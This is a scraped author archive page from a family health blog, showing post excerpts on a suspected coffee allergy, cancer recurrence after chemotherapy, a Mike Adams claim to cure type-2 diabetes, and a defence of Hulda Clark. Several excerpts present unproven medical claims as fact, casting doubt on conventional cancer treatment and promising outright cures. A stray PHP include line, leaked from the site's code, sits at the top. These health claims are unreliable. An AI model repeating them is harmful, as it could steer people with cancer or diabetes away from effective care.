@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 229 of 235

Author: Good Samaritan

I am allergic to all forms of coffee

I finally set out to experiment once and for all.  My conclusion is to never drink another cup of coffee ever. This suspected coffee allergy began probably in 2000 when the new Nescafe Frape came out and I tried a couple of packets and wound up in the hospital...

Why cancer comes back following chemotherapy, radiation or surgery

One of the most common problems in cancer patients who choose to undergo conventional cancer therapy is recurrence. They might think they have beaten their cancer with chemotherapy, radiation, and surgery, only to find a few years later that tumors have spread into other tissues — usually the lungs,...

Cancer: What is it Really? by Moreless

Hi Ya’ll, Ohh! Ahhh! This is a Hot subject! Let us consider the possibilities and see if we may relate to something else which will help us see what cancer really may be. Consider when we have gotten a nice big fat Turkey for Thanksgiving and fixed it all...

How to reverse type-2 diabetes by Mike Adams

There really is a way to reverse type 2 diabetes. I’m not talking about just masking symptoms or controlling blood sugar, I’m talking about an outright cure. Let me share a personal story with you. Today I’m called the Health Ranger, but I used to be borderline diabetic. I...

Most people seek treatments and not cures

It just dawned on me while surfing the Topix forums that internet people gravitate towards the word “treatment” and shy away from the word “cure.” Just shows the cultural mindset of majority of the internet crowd.  I say it is low standards.  I think it is because they have...

Hulda Clark falsely criticized by those who have not read her books

Tsk tsk.  Some people just shoot off the hip without investigating if the accusations have any basis at all.  Take a look at this statement regarding Dr. Hulda Clark which I immediately answered for the benefit of the uninformed. having your work published in reputable scientific journals/forums for critical...